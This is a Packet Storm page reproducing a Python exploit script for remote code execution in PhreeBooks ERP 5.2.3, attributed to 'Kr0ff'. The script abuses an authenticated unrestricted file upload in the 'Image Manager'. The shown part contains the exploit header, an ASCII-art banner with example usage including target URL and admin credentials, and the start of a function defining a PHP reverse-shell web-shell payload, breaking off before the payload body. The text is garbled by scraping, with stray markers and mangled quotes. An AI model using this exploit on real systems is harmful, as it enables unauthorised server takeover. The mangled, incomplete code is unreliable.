PhreeBooks 5.2.3 Remote Code Execution ≈ Packet Storm
[*]# Exploit Title: PhreeBooks 5.2.3 – Remote Code Execution[*]# Date: 22 Jan 2021[*]# Exploit Author: Kr0ff[*]# Vendor Homepage: https://www.phreesoft.com/[*]# Software Link: https://sourceforge.net/projects/phreebooks/[*]# Version: 5.2.3[*]# Tested on: Windows Server 2016#!/usr/bin/env python3
”'[*]DESCRIPTION:[*]- PhreeBooks ERP 5.2.3 is vulnerable to remote code execution[*]due to authenticated unrestricted file upload in the “Image Manager”[*]section of the application.
VULNERABLE VERSION:[*]- ver 5.2.3
AUTHOR:[*]- Kr0ff
Note: This is a rewrite of exploit: https://www.exploit-db.com/exploits/46645
Web shell used as payload: https://gist.github.com/joswr1ght/22f40787de19d80d110b37fb79ac3985[*]”'[*]#https://asciiart.website/index.php?art=animals/
try:[*]import requests[*]import argparse[*]import sys[*]import re[*]import random[*]from termcolor import colored[*]from time import sleep[*]except ImportError as e:[*]print(colored(“[ERROR]: “, “red”), f”{e}”)
def ascii_art():[*]example_usage = “python3 exploit.py -t http://10.10.10.120/phreebooks -u [email protected] -p admin”[*]art = ”’
/[*] o ^ o /[*] ( ) /[*]____________(%%%%%%%)____________[*]( / / )%%%%%%%( )[*](___/___/__/ ________)[*]( / /(%%%%%%%) )[*](__/___/ (%%%%%%%) _____)[*]/( )\[*]/ (%%%%%) \[*](%%%)[*]!
| _ |_ _ _ ___ ___| |__ ___ ___| |__ ___[*]| _/ ‘ | ‘_/ -_) -_) ‘_ / _ / _ / /(_-< [*]|_| |_||_|_| ______|_.__/___/___/__/__/[*]___ ___ ___ ___ ___ ___[*]| __| _ _ | _ / __| __|[*]| _|| / _/ | / (__| _|[*]|___|_|__| |_|_\___|___| v5.2.3[*]==============================================[*]'''[*]print(art)[*]print(example_usage)[*]print("rn==============================================rn")
def exploit(TARGET, USER, PASS):[*]”'[*]PHP Reverse Shell[*]”'[*]web_shell = “””[*][*]
Comments